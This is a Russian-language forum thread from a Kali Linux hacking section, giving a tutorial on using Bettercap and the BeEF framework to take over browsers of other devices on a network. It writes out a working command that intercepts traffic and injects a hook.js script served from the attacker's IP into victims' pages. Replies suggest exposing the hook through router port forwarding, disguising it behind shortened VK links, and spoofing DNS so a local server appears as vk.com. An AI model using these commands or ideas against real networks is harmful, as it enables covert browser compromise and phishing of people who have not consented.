Загрузка...

Hack devices online with Bettercap and BeEF

Thread in Kali Linux created by Watchiz Oct 13, 2017. (bumped Oct 3, 2017) 6760 views

  1. Watchiz
    Watchiz Topic starter Oct 13, 2017 34 Mar 24, 2017
    НАЧАЛО

    Для начало нам нужно установить Bettercap, пишем следующие команды :

    Code
    apt-get update
    apt-get dist-upgrade
    apt-get install bettercap
    НАСТРАИВАЕМ

    После этого запускаем BeEF Xss Framework

    [IMG]

    Дальше у нас откроется вот такой терминал:

    [IMG]

    Тыкаем на ссылку под названием "UI URL" и логинимся. Пароль и логин: beef.
    Теперь нам надо узнать наш внутренний IP. Пишим ifconfig. В моем случае у меня IP 192.168.100.4.
    Для чего мы узнавали наш IP?
    Для того чтобы мы настроили ссылку на наш HOOK.
    Как видите на терминале с BeEF показан пример ссылки с HOOK и вместо <IP> подставляем наш IP.
    HOOK - это JS скрипт дающий нам доступ к устройству.

    Ну а теперь когда мы поняли что такое HOOK, давайте заражать устройства.
    В этом нам пожет Bettercap. Запускаем его вот с такими параметрами:
    Code
    bettercap --proxy --proxy-module injectjs --js-url "192.168.100.4:3000/hook.js"
    Обьясню какие параметры за что отвечают:

    Отвечает за использование ****** для обхода SSL сертификата.
    Code
    --proxy
    Этот модуль отвечает за инджект скрипта в жертву.
    Code
    --proxy-module injectjs
    А это уже ссылка на наш HOOK.
    Code
    --js-url "192.168.100.4:3000/hook.js
    ЗАХВАТ ЖЕРТВ

    Теперь мы ждем, когда жертва(ы) зайдут на какю-нибудь страницу.
    !!! ПРОШУ ЗАМЕТИТЬ, ЕСЛИ ЖЕРТВА ЗАКРОЕТ СТРАНИЦУ СО СКРИПТОМ МЫ ПОТЕРЯЕМ ДОСТУП, НО ЕСЛИ ОНА ОТКРОЕТ ДРУГУЮ ТО СКРИПТ ВЕРНЕТСЯ !!!

    Переходим на панель BeEF.

    [IMG]

    Ну а дальше сами делаем, если хотите могу запилить тему по этой программе. Но это в другой раз!

    А на этом я прощаюсь с вами был WATCHIZ.

    #моястатья
     
  2. kelly13
    kelly13 Mar 12, 2018 7 Apr 23, 2017
    Вот мне все любопытно, проканает ли если пробросить нужную переадресацию в роутере.
    Что бы скрипт ломился на WAN а роутер уже давал на внутренний IP:PORT:thinking:
     
  3. Watchiz
    Watchiz Topic starter Mar 13, 2018 34 Mar 24, 2017
    kelly13, можно ли по подробнее?
     
  4. Watchiz
    Watchiz Topic starter Mar 13, 2018 34 Mar 24, 2017
    @RareHoneyBauger, неуверен. Termux та ещё дичь.
     
  5. kelly13
    kelly13 Mar 14, 2018 7 Apr 23, 2017
    Могу конечно ошибаться, но в моей голове это выглядит так:
    К примеру имеем внешний белый IP 1.2.3.4 и серый 192.168.0.1
    Как видно, указано в статье что используется порт 3000, следовательно в роутере прописываем маршрут соединений с 1.2.3.4:3000 go to > 192.168.0.1:3000
    В случае если бы такой маршрут прокатил бы, то мы имеем возможность в строке (из кода автора поста)
    Code

    [B]192.168.100.4:3000/ hook.js[/B]
    заменить свой внешник 1.2.3.4:3000/ hook.js, в свою очередь сам маршрутизатор должен адресовать соединение на тот же 192.168.0.1:3000.
    В таком исполнении можно уже подсовывать людям чуть ли не ВК сократив все на vk .cc или goo. gl


    По логике должно сработать собственно, но к сожалению не пробовал и эта мысль родилась буквально за 2 минуты, прошу не ругать сильно. Если я что-то не учел (а скорее всего так и есть, то просьба указать на ошибки.:wink3:
     
  6. Watchiz
    Watchiz Topic starter Mar 14, 2018 34 Mar 24, 2017
    kelly13, Не уверен что сработает.
     
  7. kelly13
    kelly13 Mar 15, 2018 7 Apr 23, 2017
    Да и я впрочем то тоже не уверен.
    Но эта так скажем теория не лишена логики.
    Что-ж. Постараюсь проверить как только с работой разгребусь. Отпишусь если что.
     
  8. 0ralo
    0ralo Mar 16, 2018 Все было хорошо, пока не стао плохо 3 Jun 1, 2017
    Это работает с хттпС
     
  9. kelly13
    kelly13 Mar 16, 2018 7 Apr 23, 2017
    с HTTPS еще более сомнительный вопрос ибо в связке kali>роутер>жертва не думаю что уместен будет сам сертификат.
     
  10. Ser0o0p
    Ser0o0p Jul 29, 2018 0 Jul 27, 2018
    Помогите у меня ошибка flag provided but not defined: -proxy
    Usage of bettercap:
     
  11. Watchiz
    Watchiz Topic starter Jul 29, 2018 34 Mar 24, 2017
    Почитай FAQ к bettercap. Он знатно обновился.
     
  12. Ser0o0p
    Ser0o0p Jul 29, 2018 0 Jul 27, 2018
    Типа уже так зделать нельзя?
     
  13. Watchiz
    Watchiz Topic starter Jul 29, 2018 34 Mar 24, 2017
    Можно, просто почитай FAQ к нему)
     
  14. Ser0o0p
    Ser0o0p Jul 29, 2018 0 Jul 27, 2018
  15. Ser0o0p
    Ser0o0p Jul 29, 2018 0 Jul 27, 2018
    Cкиньте кто то FAQ к bettercap а то я не понимаю где новая инфа, жму в kali linux bettercap --help фигня
     
  16. Watchiz
    Watchiz Topic starter Jul 29, 2018 34 Mar 24, 2017
  17. Ser0o0p
    Ser0o0p Jul 29, 2018 0 Jul 27, 2018
    спасибо
     
  18. LiqBz
    LiqBz Jul 31, 2018 0 Jul 31, 2018
    Ребят, вот тоже стало интересно. У меня есть доступ к роутеру и есть ли возможность подмены DNS так, чтобы мой localhost, отображался как vk.com?
     
  19. Sincerest
    Sincerest Aug 6, 2018 Banned 317 Jan 8, 2017
    Годный тутор, надо попробовать!
     
Loading...
Top